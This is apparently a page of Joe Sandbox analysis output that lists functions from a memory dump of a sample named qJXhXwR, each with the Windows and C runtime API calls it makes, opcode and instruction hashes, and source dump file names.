Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
Instruction ID: 3d807775da029f8d82005a31ee3528efa0f0799434f43ffc7544016210cd3b94
Opcode Fuzzy Hash: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
Instruction Fuzzy Hash: 5911EC51B0F642C2FEA67764F59427C92D19F56F64FC70234DD1E062FACE6CAC458221

Function 00007FF7A51B1475 Relevance: 2.0, APIs: 1, Instructions: 533COMMON

Download Yara Rule

APIs

_Init_thread_footer.LIBCMT ref: 00007FF7A51B1990

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: e869654350b1d585ac28b73911299a849cdf7de5e5dd263a2f3101a0d6b2730c
Instruction ID: ee2466093c59ed2b5f980d7b8b213e5c9a6b1ec71852b01e437cb641ab40a3d0
Opcode Fuzzy Hash: e869654350b1d585ac28b73911299a849cdf7de5e5dd263a2f3101a0d6b2730c
Instruction Fuzzy Hash: 2B32C362A0E68286EB66EB15E4402B9E361FB46F84F874132DE4D077B9DF3CE445C720

Function 00007FF7A52020D6 Relevance: 1.6, APIs: 1, Instructions: 109COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00007FF7A52020E2

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
Instruction ID: a173cc3f4f649398836cc51cb2de78b749277fa5cf2543e07040c21105cd8389
Opcode Fuzzy Hash: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
Instruction Fuzzy Hash: 8C415E62B0A64186EB22AF65E4403BCA3B0EB55F84F964535CE0D177AACF7CE455C360

Function 00007FF7A51C8FAC Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7A51C8FD4

Part of subcall function 00007FF7A51C9164: GetModuleHandleExW.KERNEL32 ref: 00007FF7A51C9184
Part of subcall function 00007FF7A51C9164: GetProcAddress.KERNEL32 ref: 00007FF7A51C919A
Part of subcall function 00007FF7A51C9164: FreeLibrary.KERNEL32 ref: 00007FF7A51C91BF

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 79a8f9e3fe50e3bd62fad2946b9f3cab9d1411ae91e96718622d0c848b5f8289
Instruction ID: 1090b74527d41a8b27eb4ac5c34777df27559edc61bd8676ae8341c525c57ecc
Opcode Fuzzy Hash: 79a8f9e3fe50e3bd62fad2946b9f3cab9d1411ae91e96718622d0c848b5f8289
Instruction Fuzzy Hash: AA41E3A1E0B65282FB55FB50E850178A355AF42F40FD64035EA0D476F9EE3EF841C760

Function 00007FF7A51D48E0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51D4835

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
Instruction ID: d2fdfe9bd849851682bdb5568dce6a1b761e0b47971f6f6031c9a53df53f2ab8
Opcode Fuzzy Hash: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
Instruction Fuzzy Hash: 93216223B0B68282EA52BF51F400279D261BF46FC4F964031EA4C57BAEDFBCD9418760

Function 00007FF7A51E6D04 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51E6D34

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
Instruction ID: 7ccfa01331d3959bbc478fd5c7faff9b4a65a537efa287681274229776474763
Opcode Fuzzy Hash: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
Instruction Fuzzy Hash: 0421C73261964287E766AF24F440379B6A0FB81FA4FD54234DE9D866E9DF2CD800CB10

Function 00007FF7A51DE258 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51DE28C

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: cd67e12c883e9f8bd43024705065033ffad1d181a756db3b5eb2a2d32994f697
Instruction ID: 00220ccb529aaee5660465c8367b81ae875ab1da3a69c8d125a9e6b94557bb96
Opcode Fuzzy Hash: cd67e12c883e9f8bd43024705065033ffad1d181a756db3b5eb2a2d32994f697
Instruction Fuzzy Hash: 2C114F3391F68282F612AB55F840939F3A5FB46B81F960135E68D476F9DF2CE5008720

Function 00007FF7A5225B80 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
Instruction ID: c4d9c6f789209ad1afcd07c2ff3190e9b69559873b11b92b51f3742fc0c566d7
Opcode Fuzzy Hash: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
Instruction Fuzzy Hash: 6811306AB1AA4581EB44AF15D48037CA360EB96FD0F959132DE1E4B3F9CF3DD4908310

Function 00007FF7A51E0414 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
Instruction ID: dde18467fe1d2969c45f84adb075c069df982ec2f10838b15c83429fffbb0e18
Opcode Fuzzy Hash: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
Instruction Fuzzy Hash: B6119D6290A646C7EA06BF50E5002BCB761EB92B54FD24132EA4D062FACFBCD400CB20

Function 00007FF7A51D48EC Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51D4909

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5f4a90eb59d34f8a58853582a43e16d1c8b32088f69f0843c5a4c245a390bb8e
Instruction ID: a10bde545fc5e8d288220d2f43ee6cb21a837ae6bac0e481de9d1e7fd3ec60de
Opcode Fuzzy Hash: 5f4a90eb59d34f8a58853582a43e16d1c8b32088f69f0843c5a4c245a390bb8e
Instruction Fuzzy Hash: 99018813F0B10741FD1A7A66F45137891509F5BF64FA60730E93D462FACEACE4418260

Function 00007FF7A51D4970 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51D4999

Part of subcall function 00007FF7A51D48EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51D4909

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
Instruction ID: 67c9c01d78f70ecd8d4ec1c600ef6d6c20bead72a18b1d2f29ae7abfee6d2b09
Opcode Fuzzy Hash: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
Instruction Fuzzy Hash: 9DF09623B0F14342E91A7766F441279A2809F46F94F961530E95E462EECEACD4528621

Function 00007FF7A51A652C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51D4970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51D4999

FreeLibrary.KERNEL32(?,?,?,00007FF7A51EC8FE), ref: 00007FF7A51A656F

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: FreeLibrary_invalid_parameter_noinfo
String ID:
API String ID: 3938577545-0
Opcode ID: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
Instruction ID: 53f6993b0d2cbd0760b28f137ee9fed20c0f69117a49d0631278f254febddb11
Opcode Fuzzy Hash: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
Instruction Fuzzy Hash: C7F03A52E0AA0582EF1BEF75E0553386260AB59F48F9A0530CA0E4A19DCF6CD8548261

Function 00007FF7A51C4C68 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7A51C4C5C

Part of subcall function 00007FF7A51C5600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7A51C5609
Part of subcall function 00007FF7A51C5600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF7A51C561A

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 1680350287-0
Opcode ID: 8e577e6f8b8e95c99a6e9f34b5ad26aa57ee5c6d8527cbb39473b96b23732f7c
Instruction ID: 35665eee169e48f137af359f56ce41700b1ffb3b696201a886db9c199a4f2a65
Opcode Fuzzy Hash: 8e577e6f8b8e95c99a6e9f34b5ad26aa57ee5c6d8527cbb39473b96b23732f7c
Instruction Fuzzy Hash: A1E01240F0F20705FA2A7761B5020B880400F6AF72EEA1B30D97E442FAAC8EA0508138

Function 00007FF7A521B334 Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE ref: 00007FF7A521B365

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
Instruction ID: e8c1b235096871b0fa5a7824631cc544e156b9aec0f01d94686a16982ab29045
Opcode Fuzzy Hash: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
Instruction Fuzzy Hash: CDE03932608A9182D720DB06F84031AE370FB8ABD8F944525EF8C47B2DCF7DC5518B80

Function 00007FF7A51CDEF8 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51DDE20: DeleteCriticalSection.KERNEL32 ref: 00007FF7A51DDE93

DeleteCriticalSection.KERNEL32 ref: 00007FF7A51CDF29

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CriticalDeleteSection
String ID:
API String ID: 166494926-0
Opcode ID: 1e503f39ac4771ab9e5c77a385804bbde878bde5e9aec211bf0958570055964e
Instruction ID: 4e6cb5dbb5aa8b53ece9d7634185b1c357a4c827644c9da9e82ce121eb1454a1
Opcode Fuzzy Hash: 1e503f39ac4771ab9e5c77a385804bbde878bde5e9aec211bf0958570055964e
Instruction Fuzzy Hash: AFF06597E0B90641FB01BBA5ECD13B593909FD6F05FD20131D81E422BECE2CA495C231

Function 00007FF7A51A3EB4 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE ref: 00007FF7A51A3ED8

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
Instruction ID: 8922e1901cba31e36156e7a56705223717035a43b19b00b4bc9dc82f675d05ac
Opcode Fuzzy Hash: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
Instruction Fuzzy Hash: 23E0D822B0874291D722AB65F5443B8A3A1FF8CBC4F454031EE8C4376ECD6CC6848B10

Function 00007FF7A51A5D88 Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32 ref: 00007FF7A51A5DDE

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
Instruction ID: 719b5024f63c433737b353e02224a612cd6bc218a285f8e5e27801fccd985dc0
Opcode Fuzzy Hash: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
Instruction Fuzzy Hash: 8BF082A1A1E78587E762AB64E8443B5B6A4F786B08FC50039E58D063A9CE3DD305CF50

Function 00007FF7A51A1080 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A7920: RegOpenKeyExW.KERNELBASE(?,?,?,00007FF7A51A109E), ref: 00007FF7A51A7A75

_onexit.LIBCMT ref: 00007FF7A51C4F10

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Open_onexit
String ID:
API String ID: 3030063568-0
Opcode ID: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
Instruction ID: 0ac904d57cf16768e63d975cb3a1317c77c4645870bc21af5ef4a44307d28ef3
Opcode Fuzzy Hash: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
Instruction Fuzzy Hash: EEE0EC90F1F54FC1EA05B7A9E8850B493906F57B06FC25536D50C823B9EE6CD2958720

Function 00007FF7A51A1048 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

_onexit.LIBCMT ref: 00007FF7A51C4F10

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _onexit
String ID:
API String ID: 572287377-0
Opcode ID: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
Instruction ID: c9bcbc356dcdeef501606a7b0878cccffad11049198eed5bf848d8a2db73d9ae
Opcode Fuzzy Hash: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
Instruction Fuzzy Hash: 09C01210F5F04BC1E50A73B9E88647481D00FABB01FD20575D10D802B6DD4D52E60771

Function 00007FF7A51A1064 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

_onexit.LIBCMT ref: 00007FF7A51C4F10

Memory Dump Source

